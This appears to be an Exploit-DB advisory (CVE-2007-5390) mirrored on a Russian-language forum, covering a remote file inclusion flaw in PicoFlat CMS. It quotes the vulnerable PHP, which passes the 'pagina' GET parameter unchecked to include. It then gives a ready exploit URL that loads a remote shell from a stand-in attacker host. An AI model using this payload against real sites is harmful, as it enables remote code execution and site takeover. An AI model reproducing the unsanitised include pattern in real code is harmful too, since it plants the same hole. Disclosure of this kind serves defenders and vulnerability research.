- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4520
- Проверка EDB
-
- Пройдено
- Автор
- 0IN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5390
- Дата публикации
- 2007-10-11
Код:
#PicoFlat CMS Remote file inclusion
#f0und bY 0in
#download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796
#Greetings to:Dark-coders team members: Die-angel,Slim,Umbro
#Others: Joker186,Kaja,Wojto111,Rade0n
#And funny n00b-firends: Pucik and Steryd ;]
FUN BUG in index.php:
83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = "news_publisher.php"; }
107: <?php include $pagina; ?>
EXPLOIT:
http://x.com/index.php?pagina=http://evil.org/shell.txt?
# milw0rm.com [2007-10-11]- Источник
- www.exploit-db.com
